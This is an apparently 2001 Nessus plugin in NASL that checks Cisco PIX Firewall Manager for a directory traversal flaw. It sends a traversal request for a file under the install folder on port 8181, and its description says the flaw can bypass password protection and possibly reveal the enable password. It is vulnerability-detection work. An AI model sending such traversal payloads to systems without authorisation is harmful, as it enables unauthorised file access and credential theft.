#
# This script was written by H D Moore <hdmoore@digitaldefense.net>
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10819);
 script_bugtraq_id(691);

 name["english"] = "PIX Firewall Manager Directory Traversal";
 script_name(english:name["english"], francais:name["francais"]);

 desc["english"] = "
It is possible to read arbitrary files on this machine by using
relative paths in the url. This flaw can be used to bypass the
managment software's password protection and possibly retrieve
the enable password for the Cisco PIX.

This vulnerability has been assigned Cisco Bug ID: CSCdk39378.

Solution: Cisco originally recommended upgrading to version 4.1.6b
or version 4.2, however the same vulnerability has been found in
version 4.3. Cisco now recommends that you disable the software
completely and migrate to the new Pix Device Manager software.

Risk factor : High";


 script_description(english:desc["english"]);

 summary["english"] = "\..\..\file.txt";
 summary["francais"] = "\..\..\file.txt";
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_ATTACK);
 
 
 script_copyright(english:"This script is Copyright (C) 2001 Digital Defense Inc.",
                francais:"Ce script est Copyright (C) 2001 Digital Defense Inc.");
 family["english"] = "CGI abuses";
 family["francais"] = "Abus de CGI";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("find_service.nes");
 script_require_ports("Services/www", 8181);
 exit(0);
}
 
#
# The script code starts here
#
 
port = get_kb_item("Services/www");
if(!port)port = 8181;
 
if(get_port_state(port))
{
    req = http_get(item:string("/..\\pixfir~1\\how_to_login.html"), port:port);
    soc = open_sock_tcp(port);
    if(soc)
    {
        send(socket:soc, data:req);
        r = recv(socket:soc, length:2048);
        close(soc);
        if("How to login" >< r){
            security_hole(port);
            exit(0);
        }
    }
}
